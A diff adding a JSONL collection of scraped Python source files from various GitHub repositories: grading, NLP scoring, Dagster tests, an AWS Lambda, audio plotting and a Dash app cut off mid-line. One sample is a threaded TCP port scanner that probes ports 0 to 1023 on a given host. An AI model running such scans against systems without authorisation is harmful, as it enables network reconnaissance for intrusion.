diff --git "a/090.jsonl" "b/090.jsonl" new file mode 100644--- /dev/null +++ "b/090.jsonl" @@ -0,0 +1,2110 @@ +{"seq_id":"17078211412","text":"__author__ = 'breddels'\nimport javaobj\nimport sys\nimport io\n\n\nif __name__ == \"__main__\":\n import logging\n javaobj._log.setLevel(logging.DEBUG)\n jobj = file(sys.argv[1]).read()[16 + 5:]\n print((repr(jobj[:100])))\n pobj, index = javaobj.loads(jobj)\n rest = jobj[index:]\n import zlib\n print((repr(rest[:100])))\n datastr = zlib.decompress(rest, -15)\n stream = io.StringIO(datastr)\n m = javaobj.JavaObjectUnmarshaller(stream)\n data = m.readObject()\n while len(data) == 2:\n print((data[0].classdesc.name))\n # datastr = datastr[data[1]:]\n x = stream.read(3)\n print((\"data left\", [hex(ord(k)) for k in x]))\n stream.seek(-3, 1)\n # x = stream.read(10)\n # print \"data left\", [hex(ord(k)) for k in x]\n # stream.seek(-10, 1)\n # data = javaobj.loads(datastr)\n data = m.readObject()\n print(data)\n if data[0] == \"END\":\n print(\"end...\")\n x = stream.read(10)\n i\n print((\"data left\", [hex(ord(k)) for k in x]))\n\n print(data)\n # print pobj, index\n","repo_name":"vaexio/vaex","sub_path":"packages/vaex-ui/vaex/ui/gbin.py","file_name":"gbin.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":8057,"dataset":"github-code","pt":"53"} +{"seq_id":"72356579688","text":"#!/usr/bin/python3\n\nimport getopt, sys, os.path\nimport csv\nimport re\nimport numpy\nimport bisect\nimport math\n\ndef usage():\n scriptname = os.path.basename(sys.argv[0])\n print(\"usage: \" + scriptname + ' ')\n\ndef getopts():\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"ho:v\", [\"help\", \"output=\"])\n except getopt.GetoptError as err:\n print(err)\n usage()\n sys.exit(2)\n\n output = None\n verbose = False\n for o, a in opts:\n if o == \"-v\":\n verbose = True\n elif o in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n elif o in (\"-o\", \"--output\"):\n output = a\n else:\n assert False, \"unhandled option\"\n\n if len(args) != 2:\n usage()\n sys.exit(2)\n\n infilename = args[0]\n outfilename = args[1]\n return infilename, outfilename\n\ndef getgrade(g):\n # Grade table\n gradetable =[(70.0, 'F'), (73.0, 'C-'), (77.0, 'C'), (80.0, 'C+'), (83.0, 'B-'), (87.0, 'B'), (90.0, 'B+'), (93.0, 'A-'), (97.0, 'A'), (100.0, 'A+')]\n\n pos = bisect.bisect_right(gradetable, (math.ceil(g),))\n return gradetable[pos][1]\n\ndef main():\n infilename, outfilename = getopts()\n\n with open(infilename, newline='') as infile, open(outfilename, 'w', newline='') as outfile:\n studentreader = csv.DictReader(infile, delimiter=',', quotechar='\"', skipinitialspace=True)\n outfields = ['Last Name', 'First Name', 'Student ID', 'SectionId', 'Final_Assigned_Egrade', 'Score']\n studentwriter = csv.DictWriter(outfile, outfields, delimiter=',', quotechar='\"', skipinitialspace=True)\n studentwriter.writeheader()\n\n # Get keys from first record\n s = next(studentreader)\n keys = s.keys()\n # Return reader to first record (second line in file)\n infile.seek(0)\n next(studentreader)\n\n # Assessment items\n assessmentitems = []\n assessments = [{\"title\": \"Homework\", \"pattern\": r'HW', \"function\": lambda x: (sum(x) - min(x))/(len(x)-1), \"weight\": 15}, {\"title\": \"Matlab\", \"pattern\": r'MATLAB', \"function\": lambda x: (sum(x) - min(x))/(len(x)-1), \"weight\": 10}, {\"title\": \"Midterm\", \"pattern\": r'Midterm', \"function\": lambda x: numpy.mean(x), \"weight\": 40}, {\"title\": \"Final\", \"pattern\": r'Final', \"function\": lambda x: sum(x), \"weight\": 35}]\n pointspattern = r'\\[Total Pts: ([^]]+)]'\n\n for assessment in assessments:\n loopkeys = [k for k in keys if re.match(assessment[\"pattern\"], k)]\n assessmentitems.append({\"title\": assessment[\"title\"], \"keys\": loopkeys, \"function\": assessment[\"function\"], \"weight\": assessment[\"weight\"]})\n\n for student in studentreader:\n studentout = {}\n studentout['Last Name'] = student['Last Name']\n studentout['First Name'] = student['First Name']\n studentout['Student ID'] = student['Student ID']\n studentout['SectionId'] = student['SectionId [Total Pts: 100] |122054']\n\n scores = []\n \n for assessmentitem in assessmentitems:\n func = assessmentitem[\"function\"]\n itemscores = [float(student[k]) if student[k] else 0.0 for k in assessmentitem[\"keys\"]]\n itempoints = numpy.array([float(re.search(pointspattern, k).group(1)) for k in assessmentitem[\"keys\"]])\n itempercentages = numpy.divide(itemscores, itempoints)\n total = func(itempercentages)\n weightedtotal = assessmentitem[\"weight\"] * total\n\n scores.append({\"title\": assessmentitem[\"title\"], \"scores\": itemscores, \"points\": itempoints, \"percentages\": itempercentages, \"total\": total, \"weightedtotal\": weightedtotal})\n \n\n weightedscore = sum(score[\"weightedtotal\"] for score in scores)\n studentout['Final_Assigned_Egrade'] = getgrade(weightedscore)\n studentout['Score'] = weightedscore\n\n studentwriter.writerow(studentout)\n \n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"pabryan/homedir","sub_path":"bin/ucsd_calculate_grades.py","file_name":"ucsd_calculate_grades.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33862778451","text":"import marshal\nimport math\nimport operator\nfrom optparse import OptionParser\n\nimport torch\nimport torch.nn.functional as F\nfrom apex import amp\nfrom torch.nn.utils.rnn import pad_sequence\n\nfrom seq2seq import Seq2Seq, future_mask\nfrom textprocessor import TextProcessor\n\n\ndef get_option_parser():\n parser = OptionParser()\n parser.add_option(\"--tok\", dest=\"tokenizer_path\", help=\"Path to the tokenizer folder\", metavar=\"FILE\", default=None)\n parser.add_option(\"--model\", dest=\"model\", metavar=\"FILE\", default=None)\n parser.add_option(\"--fp16\", action=\"store_true\", dest=\"fp16\", default=False)\n parser.add_option(\"--capacity\", dest=\"total_capacity\", help=\"Batch capacity\", type=\"int\", default=2000)\n parser.add_option(\"--data\", dest=\"data\", metavar=\"FILE\", default=None)\n parser.add_option(\"--sens\", dest=\"sens\", metavar=\"FILE\", default=None)\n parser.add_option(\"--output\", dest=\"output\", metavar=\"FILE\", default=None)\n parser.add_option(\"--resume\", dest=\"resume_index\", type=\"int\", default=0)\n parser.add_option(\"--end\", dest=\"end_index\", type=\"int\", default=-1)\n parser.set_default(\"model_size\", 6)\n return parser\n\n\ntok_sen = lambda s: text_processor.tokenize_one_sentence(s)[:512]\n\n\ndef create_batches(sentences, src2dst_dict, text_processor: TextProcessor, resume_index=0, end_index=-1):\n print(len(src2dst_dict))\n\n print(\"Getting batches...\")\n index = 0\n\n for sid in src2dst_dict.keys():\n index += 1\n if index >= end_index and end_index > 0:\n break\n if index <= resume_index:\n continue\n tids = list(src2dst_dict[sid])\n source_tokenized = torch.LongTensor(tok_sen(sentences[sid]))\n trans_cands = list(map(lambda i: torch.LongTensor(tok_sen(sentences[i])), tids))\n candidates = pad_sequence(trans_cands, batch_first=True, padding_value=text_processor.pad_token_id())\n target_langs = list(map(lambda i: text_processor.lang_id(sentences[i].strip().split(\" \")[0]), tids))\n src_lang = torch.LongTensor([text_processor.lang_id(sentences[sid].strip().split(\" \")[0])])\n yield sid, source_tokenized, torch.LongTensor(tids), candidates, src_lang, torch.LongTensor(target_langs)\n\n\nif __name__ == \"__main__\":\n parser = get_option_parser()\n (options, args) = parser.parse_args()\n\n print(\"Loading text processor...\")\n text_processor = TextProcessor(options.tokenizer_path)\n num_processors = max(torch.cuda.device_count(), 1)\n\n print(\"Loading model...\")\n model = Seq2Seq.load(Seq2Seq, options.model, tok_dir=options.tokenizer_path)\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = model.to(device)\n num_gpu = torch.cuda.device_count()\n\n assert num_gpu <= 1\n if options.fp16:\n model = amp.initialize(model, opt_level=\"O2\")\n\n max_capacity = options.total_capacity * 1000000\n with torch.no_grad(), open(options.output, \"w\") as writer:\n print(\"Loading data...\")\n with open(options.sens, \"rb\") as fp, open(options.data, \"rb\") as fp2:\n sentences = marshal.load(fp)\n src2dst_dict = marshal.load(fp2)\n\n print(\"Scoring candidates\")\n for i, batch in enumerate(\n create_batches(sentences, src2dst_dict, text_processor, options.resume_index, options.end_index)):\n try:\n sid, src_input, tids_all, tgt_inputs_all, src_lang, dst_langs_all = batch\n cur_capacity = 2 * (max(int(src_input.size(0)), int(tgt_inputs_all.size(1))) ** 3) * int(\n tgt_inputs_all.size(0))\n split_size = int(math.ceil(cur_capacity / max_capacity))\n split_size = max(1, int(math.floor(len(tids_all) / split_size)))\n\n tgt_inputs_spl = torch.split(tgt_inputs_all, split_size)\n tids_spl = torch.split(tids_all, split_size)\n dst_langs_spl = torch.split(dst_langs_all, split_size)\n\n trans_score = dict()\n for spl_i in range(len(tgt_inputs_spl)):\n src_input = src_input.view(-1, src_input.size(0)).to(device)\n src_mask = (src_input != text_processor.pad_token_id())\n src_lang = src_lang.to(device)\n encoder_states = model.encode(src_input, src_mask, src_lang.expand(src_input.size()))[0]\n\n tgt_inputs, tids, dst_langs = tgt_inputs_spl[spl_i], tids_spl[spl_i], dst_langs_spl[spl_i]\n tgt_mask = (tgt_inputs != text_processor.pad_token_id()).to(device)\n\n tgt_inputs = tgt_inputs.to(device)\n dst_langs = dst_langs.to(device)\n batch_lang = int(dst_langs[0])\n subseq_mask = future_mask(tgt_mask[:, :-1])\n if subseq_mask.device != tgt_inputs.device:\n subseq_mask = subseq_mask.to(device)\n\n decoder = model.decoder if not model.lang_dec else model.decoder[batch_lang]\n output_layer = model.output_layer if not model.lang_dec else model.output_layer[batch_lang]\n\n enc_states = encoder_states.expand(len(tgt_inputs), encoder_states.size(1), encoder_states.size(2))\n src_mask_spl = src_mask.expand(len(tgt_inputs), src_mask.size(1))\n dst_langs = dst_langs.unsqueeze(1).expand(tgt_inputs.size())\n decoder_output = decoder(encoder_states=enc_states, input_ids=tgt_inputs[:, :-1],\n encoder_attention_mask=src_mask_spl, tgt_attention_mask=subseq_mask,\n token_type_ids=dst_langs[:, :-1])\n predictions = F.log_softmax(output_layer(decoder_output), dim=-1)\n\n predictions = predictions.view(-1, predictions.size(-1))\n targets = tgt_inputs[:, 1:].contiguous().view(-1)\n w_losses = tgt_mask[:, 1:] * predictions.gather(1, targets.view(-1, 1)).squeeze(-1).view(\n len(tgt_mask),\n -1)\n loss = torch.sum(w_losses, dim=1)\n loss = torch.div(loss, torch.sum(tgt_mask[:, 1:], dim=-1)).cpu().numpy()\n for j, l in enumerate(loss):\n tid = tids[j]\n trans_score[tid] = l\n sorted_dict = sorted(trans_score.items(), key=operator.itemgetter(1), reverse=True)\n tid, score = sorted_dict[0]\n writer.write(sentences[sid] + \"\\t\" + sentences[tid] + \"\\t\" + str(score))\n writer.write(\"\\n\")\n\n print(options.resume_index + i + 1, len(src2dst_dict), end=\"\\r\")\n except RuntimeError:\n pass\n\n print(\"\\nDone!\")\n","repo_name":"rasoolims/ImageTranslate","sub_path":"src/score_pairs.py","file_name":"score_pairs.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"5664587181","text":"\nfrom typing import NamedTuple, Optional, Literal\nfrom .registrant_workflows import RegistrantWorkflows\nfrom .list_workshops_workflow import ListWorkshopsWorkflow\nfrom .attendance_workflow import AttendanceWorkflow\n\nclass App(NamedTuple):\n workshop_workflow: ListWorkshopsWorkflow\n registrant_workflows: RegistrantWorkflows\n attendance_workflow: AttendanceWorkflow\n \n def list_upcoming_workshops(self) -> None:\n self.workshop_workflow.check_upcoming_workshops()\n\n def list_registrants(self, workshop_id: str, status: Optional[Literal['approved', 'waitlisted', 'rejected']] = None) -> None:\n \n if status and status not in ['approved', 'waitlisted', 'rejected']:\n raise ValueError(\"given status invalid\")\n self.registrant_workflows.list_registrants(workshop_id=workshop_id, status = status)\n\n def update_registration_status(\n self, \n workshop_id: str, \n registration_id: str,\n to_status: Literal['approved','rejected', 'waitlisted'],\n ) -> None:\n self.registrant_workflows.update_registrant_status(\n workshop_id=workshop_id, \n registration_id=registration_id,\n to_status=to_status,\n )\n \n def create_attendance_summary(self, workshop_id: str, output_filename: Optional[str] = None) -> None:\n self.attendance_workflow.create_attendance_summary(workshop_id=workshop_id, output_filename=output_filename)\n","repo_name":"ibehave-ibots/course-attendance-service","sub_path":"workshop-registration/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34091791645","text":"from api.local_stocks.Ticker import Ticker\n\nREMOVE_TICKER = 'remove-ticker'\n\n\ndef remove_ticker(args):\n\t\"\"\"\n\tUpdate the provided ticker if it already exists\n\t\"\"\"\n\tif args is None:\n\t\targs = []\n\n\tif len(args) < 1:\n\t\tprint(\"ERROR: Please provide a ticker to remove\")\n\t\treturn 1\n\n\ttest_ticker = args[0]\n\tprint('Removing ticker: %s' % test_ticker)\n\tfound_t = Ticker.get_ticker(test_ticker)\n\tif found_t is None:\n\t\tprint(\"Ticker %s is not in the database. Nothing to do. Exiting.\" % test_ticker)\n\t\treturn 0\n\n\tTicker.delete_ticker(test_ticker)\n\tprint(\"Ticker %s successfully deleted!\" % test_ticker)\n\treturn 0\n","repo_name":"michaelalbinson/glowing-pancake-praw","sub_path":"cli/remove_ticker.py","file_name":"remove_ticker.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9889493067","text":"import os\n\nimport pytest\nfrom dagster import DagsterInstance, job, op, reconstructable, repository\nfrom dagster._core.execution.api import execute_job\nfrom dagster._core.execution.plan.resume_retry import ReexecutionStrategy\nfrom dagster._core.storage.dagster_run import DagsterRunStatus\nfrom dagster._core.storage.tags import RESUME_RETRY_TAG\nfrom dagster._core.test_utils import (\n environ,\n instance_for_test,\n poll_for_finished_run,\n step_did_not_run,\n step_succeeded,\n)\nfrom dagster._core.workspace.context import WorkspaceProcessContext\nfrom dagster._core.workspace.load_target import PythonFileTarget\n\nCONDITIONAL_FAIL_ENV = \"DAGSTER_CONDIIONAL_FAIL\"\n\n\n@op\ndef before_failure():\n return \"hello\"\n\n\n@op\ndef conditional_fail(_, input_value):\n if os.environ.get(CONDITIONAL_FAIL_ENV):\n raise Exception(\"env set, failing!\")\n\n return input_value\n\n\n@op\ndef after_failure(_, input_value):\n return input_value\n\n\n@job(tags={\"foo\": \"bar\"})\ndef conditional_fail_job():\n after_failure(conditional_fail(before_failure()))\n\n\n@repository\ndef repo():\n return [conditional_fail_job]\n\n\n@pytest.fixture(name=\"instance\", scope=\"module\")\ndef instance_fixture():\n with instance_for_test() as instance:\n yield instance\n\n\n@pytest.fixture(name=\"workspace\", scope=\"module\")\ndef workspace_fixture(instance):\n with WorkspaceProcessContext(\n instance,\n PythonFileTarget(\n python_file=__file__,\n attribute=None,\n working_directory=None,\n location_name=\"repo_loc\",\n ),\n ) as workspace_process_context:\n yield workspace_process_context.create_request_context()\n\n\n@pytest.fixture(name=\"code_location\", scope=\"module\")\ndef code_location_fixture(workspace):\n return workspace.get_code_location(\"repo_loc\")\n\n\n@pytest.fixture(name=\"external_job\", scope=\"module\")\ndef external_job_fixture(code_location):\n return code_location.get_repository(\"repo\").get_full_external_job(\"conditional_fail_job\")\n\n\n@pytest.fixture(name=\"failed_run\", scope=\"module\")\ndef failed_run_fixture(instance):\n # trigger failure in the conditionally_fail op\n with environ({CONDITIONAL_FAIL_ENV: \"1\"}):\n result = execute_job(\n reconstructable(conditional_fail_job),\n instance=instance,\n tags={\"fizz\": \"buzz\", \"foo\": \"not bar!\"},\n )\n\n assert not result.success\n\n return instance.get_run_by_id(result.run_id)\n\n\ndef test_create_reexecuted_run_from_failure(\n instance: DagsterInstance,\n workspace,\n code_location,\n external_job,\n failed_run,\n):\n run = instance.create_reexecuted_run(\n parent_run=failed_run,\n code_location=code_location,\n external_job=external_job,\n strategy=ReexecutionStrategy.FROM_FAILURE,\n )\n\n assert run.tags[RESUME_RETRY_TAG] == \"true\"\n assert set(run.step_keys_to_execute) == {\"conditional_fail\", \"after_failure\"} # type: ignore\n instance.launch_run(run.run_id, workspace)\n run = poll_for_finished_run(instance, run.run_id)\n\n assert run.status == DagsterRunStatus.SUCCESS\n assert step_did_not_run(instance, run, \"before_failure\")\n assert step_succeeded(instance, run, \"conditional_fail\")\n assert step_succeeded(instance, run, \"after_failure\")\n\n\ndef test_create_reexecuted_run_from_failure_tags(\n instance: DagsterInstance,\n code_location,\n external_job,\n failed_run,\n):\n run = instance.create_reexecuted_run(\n parent_run=failed_run,\n code_location=code_location,\n external_job=external_job,\n strategy=ReexecutionStrategy.FROM_FAILURE,\n )\n\n assert run.tags[\"foo\"] == \"bar\"\n assert \"fizz\" not in run.tags\n\n run = instance.create_reexecuted_run(\n parent_run=failed_run,\n code_location=code_location,\n external_job=external_job,\n strategy=ReexecutionStrategy.FROM_FAILURE,\n use_parent_run_tags=True,\n )\n\n assert run.tags[\"foo\"] == \"not bar!\"\n assert run.tags[\"fizz\"] == \"buzz\"\n\n run = instance.create_reexecuted_run(\n parent_run=failed_run,\n code_location=code_location,\n external_job=external_job,\n strategy=ReexecutionStrategy.FROM_FAILURE,\n use_parent_run_tags=True,\n extra_tags={\"fizz\": \"not buzz!!\"},\n )\n\n assert run.tags[\"foo\"] == \"not bar!\"\n assert run.tags[\"fizz\"] == \"not buzz!!\"\n\n\ndef test_create_reexecuted_run_all_steps(\n instance: DagsterInstance, workspace, code_location, external_job, failed_run\n):\n run = instance.create_reexecuted_run(\n parent_run=failed_run,\n code_location=code_location,\n external_job=external_job,\n strategy=ReexecutionStrategy.ALL_STEPS,\n )\n\n assert RESUME_RETRY_TAG not in run.tags\n\n instance.launch_run(run.run_id, workspace)\n run = poll_for_finished_run(instance, run.run_id)\n\n assert run.status == DagsterRunStatus.SUCCESS\n assert step_succeeded(instance, run, \"before_failure\")\n assert step_succeeded(instance, run, \"conditional_fail\")\n assert step_succeeded(instance, run, \"after_failure\")\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster_tests/core_tests/instance_tests/test_instance_reexecution.py","file_name":"test_instance_reexecution.py","file_ext":"py","file_size_in_byte":5069,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"13391058106","text":"#!/usr/bin/env python3\n\nimport json\nimport logging\n\nimport boto3\nimport spacy\n\nfrom database import db_connection\nfrom utils.environment_helpers import validate_env_variable\nfrom utils.initialise_db import init_db_connection\n\nLOGGER = logging.getLogger()\nLOGGER.setLevel(logging.INFO)\n\n\n# isolating processing from event unpacking for portability and testing\ndef process_event(sqs_rec):\n \"\"\"\n Function to fetch the XML, call the legislation replacements pipeline and upload the enriched XML to the\n destination bucket\n \"\"\"\n s3_client = boto3.client(\"s3\")\n\n message = json.loads(sqs_rec[\"body\"])\n LOGGER.info(\"EVENT: %s\", message)\n msg_attributes = sqs_rec[\"messageAttributes\"]\n replacements = message[\"replacements\"]\n source_key = msg_attributes[\"source_key\"][\"stringValue\"]\n\n source_bucket = msg_attributes[\"source_bucket\"][\"stringValue\"]\n LOGGER.info(\"Replacement bucket from message\")\n LOGGER.info(source_bucket)\n\n LOGGER.info(\"Input bucket name:%s\", source_bucket)\n LOGGER.info(\"Input S3 key:%s\", source_key)\n\n # fetch the judgement contents\n file_content = (\n s3_client.get_object(Bucket=source_bucket, Key=source_key)[\"Body\"]\n .read()\n .decode(\"utf-8\")\n )\n\n # determine legislation replacements\n replacements = determine_replacements(file_content)\n LOGGER.info(\"Detected citations and built replacements\")\n replacements_encoded = write_replacements_file(replacements)\n LOGGER.info(\"Wrote replacements to file\")\n LOGGER.info(replacements_encoded)\n\n # open and read existing file from s3 bucket\n replacements_content = (\n s3_client.get_object(Bucket=REPLACEMENTS_BUCKET, Key=source_key)[\"Body\"]\n .read()\n .decode(\"utf-8\")\n )\n replacements_encoded = replacements_content + replacements_encoded\n\n uploaded_key = upload_replacements(\n REPLACEMENTS_BUCKET, source_key, replacements_encoded\n )\n LOGGER.info(\"Uploaded replacements to %s\", uploaded_key)\n push_contents(source_bucket, source_key)\n # enrichment_tracking(ENRICHMENT_BUCKET, \"enrichment_tracking.csv\")\n LOGGER.info(\n \"Message sent on queue to start determine-replacements-abbreviations lambda\"\n )\n\n\ndef enrichment_tracking(bucket, key):\n \"\"\"\n Print XML to track progress\n \"\"\"\n s3_resource = boto3.resource(\"s3\")\n s3_object = s3_resource.Object(bucket, key)\n\n # data = s3_object.get()[\"Body\"].read().decode(\"utf-8\").splitlines()\n data = s3_object.get()[\"Body\"].read().decode(\"utf-8\")\n\n print(data)\n # lines = csv.reader(data)\n # headers = next(lines)\n # print(\"headers: %s\" % (headers))\n # for line in lines:\n # print complete line\n # print(line)\n # print index wise\n # print(line[0], line[1])\n\n\ndef write_replacements_file(replacement_list):\n \"\"\"\n Writes tuples of abbreviations and long forms from a list of replacements\n \"\"\"\n tuple_file = \"\"\n for i in replacement_list:\n replacement_object = {\"{}\".format(type(i).__name__): list(i)}\n tuple_file += json.dumps(replacement_object)\n tuple_file += \"\\n\"\n return tuple_file\n\n\ndef upload_replacements(replacements_bucket, replacements_key, replacements):\n \"\"\"\n Uploads replacements to S3 bucket\n \"\"\"\n LOGGER.info(\n \"Uploading text content to %s/%s\", replacements_bucket, replacements_key\n )\n s3 = boto3.resource(\"s3\")\n object = s3.Object(replacements_bucket, replacements_key)\n object.put(Body=replacements)\n return object.key\n\n\ndef init_NLP():\n \"\"\"\n Load spacy model\n \"\"\"\n nlp = spacy.load(\n \"en_core_web_sm\", exclude=[\"tok2vec\", \"attribute_ruler\", \"lemmatizer\", \"ner\"]\n )\n nlp.max_length = 2500000\n return nlp\n\n\ndef close_connection(db_conn):\n \"\"\"\n Close the database connection\n \"\"\"\n db_connection.close_connection(db_conn)\n\n\ndef determine_replacements(file_content):\n \"\"\"\n Fetch legislation replacements from database\n \"\"\"\n # connect to the database\n db_conn = init_db_connection()\n LOGGER.info(\"Connected to database\")\n\n # setup the spacy pipeline\n nlp = init_NLP()\n LOGGER.info(\"Loaded NLP model\")\n\n doc = nlp(file_content)\n\n leg_titles = db_connection.get_legtitles(db_conn)\n\n replacements = get_legislation_replacements(leg_titles, nlp, doc, db_conn)\n LOGGER.info(\"Replacements identified\")\n LOGGER.info(len(replacements))\n close_connection(db_conn)\n\n return replacements\n\n\ndef get_legislation_replacements(leg_titles, nlp, doc, db_conn):\n \"\"\"\n Runs the legislation pipeline on the XML and returns the replacements\n \"\"\"\n from legislation_extraction.legislation_matcher_hybrid import leg_pipeline\n\n replacements = leg_pipeline(leg_titles, nlp, doc, db_conn)\n print(replacements)\n return replacements\n\n\ndef push_contents(uploaded_bucket, uploaded_key):\n \"\"\"\n Delivers replacements to the specified queue\n \"\"\"\n # Get the queue\n sqs = boto3.resource(\"sqs\")\n queue = sqs.Queue(DEST_QUEUE)\n\n # Create a new message\n message = {\"replacements\": uploaded_key}\n msg_attributes = {\n \"source_key\": {\"DataType\": \"String\", \"StringValue\": uploaded_key},\n \"source_bucket\": {\"DataType\": \"String\", \"StringValue\": uploaded_bucket},\n }\n queue.send_message(\n MessageBody=json.dumps(message), MessageAttributes=msg_attributes\n )\n\n\nDEST_QUEUE = validate_env_variable(\"DEST_QUEUE_NAME\")\nREPLACEMENTS_BUCKET = validate_env_variable(\"REPLACEMENTS_BUCKET\")\nENRICHMENT_BUCKET = validate_env_variable(\"ENRICHMENT_BUCKET\")\n\n\ndef handler(event, context):\n \"\"\"\n Function called by the lambda to run the process event\n \"\"\"\n LOGGER.info(\"Determine legislation replacements\")\n LOGGER.info(DEST_QUEUE)\n try:\n LOGGER.info(\"SQS EVENT: %s\", event)\n\n for sqs_rec in event[\"Records\"]:\n # stop the test notification event from breaking the parsing logic\n if \"Event\" in sqs_rec.keys() and sqs_rec[\"Event\"] == \"s3:TestEvent\":\n break\n process_event(sqs_rec)\n\n except Exception as exception:\n LOGGER.error(\"Exception: %s\", exception)\n raise\n","repo_name":"nationalarchives/ds-caselaw-data-enrichment-service","sub_path":"src/lambdas/determine_replacements_legislation/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"24913931237","text":"#!/usr/bin/python3\n\nimport socket\nfrom IPy import IP\nimport optparse\nimport threading\nfrom array import *\nfrom IPy import IP\nfrom datetime import datetime\n\ndef portscan(tar,port):\n try:\n ip = checker(tar)\n sock = socket.socket()\n sock.settimeout(5)\n sock.connect((ip, port))\n try:\n serv = socket.getservbyport(port)\n print(port,\"\\topen\\t\",serv)\n except:\n print(port,\"\\topen\\tUnknown service!!\")\n except:\n pass\n\n\n\n#this is to checker is in ip or domain name\ndef checker(target):\n try:\n IP(target)\n return (target)\n except ValueError:\n return socket.gethostbyname(target)\n\ndef main():\n try:\n parser = optparse.OptionParser( 'Usage of program: '+ '-H \\n EAMPLE : ./portscan.py -H 8.8.8.8 \\n \\t./portscan.py -H google.com ')\n parser.add_option('-H', dest='tgtHost', type='string', help= 'specify target host')\n (options, args) = parser.parse_args()\n tgtHost = options.tgtHost\n\n #this is for display options\n if (tgtHost) == None :\n print(parser.usage)\n exit(0)\n\n # Add Banner\n print(\"-\" * 50)\n print(\"Scanning Target: \" + socket.gethostbyname(tgtHost))\n print(\"Scanning started at:\" + str(datetime.now()))\n print(\"-\" * 50)\n print(\"\"\"PORT\\tSTATE\\tSERVICE\"\"\")\n\n for port in range(0,1024):\n t= threading.Thread(target=portscan, args=(tgtHost,int(port)))\n t.start()\n\n except KeyboardInterrupt:\n print(\"\\n Exiting Program !!!!\")\n exit(0)\n except socket.gaierror:\n print(\"\\n Hostname Could Not Be Resolved !!!!\")\n exit(0)\n except socket.error:\n print(\"\\ Server not responding !!!!\")\n exit(0)\n\n\nif __name__ == '__main__':\n main()","repo_name":"17arun/scanners","sub_path":"Port Scanner/port scanner.py","file_name":"port scanner.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9105484607","text":"import random\nimport time\nimport functools\n\n\ndef create_table(size, min, max):\n tab = []\n for i in range(0, size + 1):\n random_int = random.randint(min, max)\n tab.append(random_int)\n return tab\n\n\ndef timeit(func):\n @functools.wraps(func)\n def new_func(*args, **kwargs):\n start_time = time.time()\n result = func(*args, **kwargs)\n elapsed_time = time.time() - start_time\n print('function [{}] finished in {} ms'.format(\n func.__name__, int(elapsed_time * 1_000)))\n return result\n\n return new_func\n\n\ndef merge_sort(A):\n if len(A) > 1:\n mid = len(A) // 2\n L = A[:mid]\n R = A[mid:]\n merge_sort(L)\n merge_sort(R)\n i = j = k = 0\n while i < len(L) and j < len(R):\n if L[i] < R[j]:\n A[k] = L[i]\n i += 1\n else:\n A[k] = R[j]\n j += 1\n k += 1\n while i < len(L):\n A[k] = L[i]\n i += 1\n k += 1\n while j < len(R):\n A[k] = R[j]\n j += 1\n k += 1\n\n\n@timeit\ndef merg_sort_timed(A):\n merge_sort(A)\n\n\ntable_size = 100000\n# samples:\nRandomArray = create_table(table_size, 1, table_size)\n\nSortedArray = RandomArray[:]\nSortedArray.sort()\n\nReversedArray = SortedArray[::-1][:]\n\n\n\nprint(\"For random data : \", end='')\nmerg_sort_timed(RandomArray)\nprint(\"-----------------\")\nprint(\"For sorted data : \", end='')\nmerg_sort_timed(SortedArray)\nprint(\"-----------------\")\nprint(\"For sorted in reverse order data : \", end='')\nmerg_sort_timed(ReversedArray)\n","repo_name":"JanOstrowski1/sorting-algorithms-efficiency","sub_path":"merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27808360582","text":"#!/usr/bin/python\nimport librosa\nimport numpy as np\nimport matplotlib.pyplot as plt\nf_name = \"trainfile016_CettisWarbler03\"\n\nfile_path = \"../zShortBirdRecordings/\" + f_name + \".wav\"\n\ny, sr = librosa.load(file_path)\n\nfreq_min = 500\nfreq_max = 8000\n\n# Passing through arguments to the Mel filters\nS = librosa.feature.melspectrogram(y=y, sr=sr, n_mels=128, fmin=freq_min, fmax=freq_max)\n\n\nlibrosa.display.specshow(librosa.logamplitude(S,\n ref_power=np.max),\n y_axis='mel', fmin=freq_min, fmax=freq_max,\n x_axis='time')\n\nplt.colorbar(format='%+2.0f dBFS')\nplt.title('Mel spectrogram')\nplt.tight_layout()\nplt.show()\n#plt.savefig(filename=\"../zShortMelSpectrograms/\" + f_name + \".png\")\n","repo_name":"Wubuntu88/BirdCallClassification","sub_path":"figure_generator_scripts/melspectrogram_tester.py","file_name":"melspectrogram_tester.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8425508985","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objects as go\nfrom dash.dependencies import Input, Output, State\n\nimport pandas as pd\nimport dash\nimport dash_core_components as dcc\nimport plotly.graph_objects as go\nimport dash_html_components as html\n\n\nimport plotly.express as px\nimport numpy as np\nfrom plotly.subplots import make_subplots\n\n\n\n# Reading in the data \ndf = pd.read_csv('data/Flu_Shot_Data_cleaned_2.csv')\n\ndata = df.groupby([\"h1n1_concern\",\"h1n1_vaccine\"],as_index=True)[\"opinion_h1n1_risk\"].count().reset_index(name=\"count\")\ndata['Percentage'] = (data['count'] 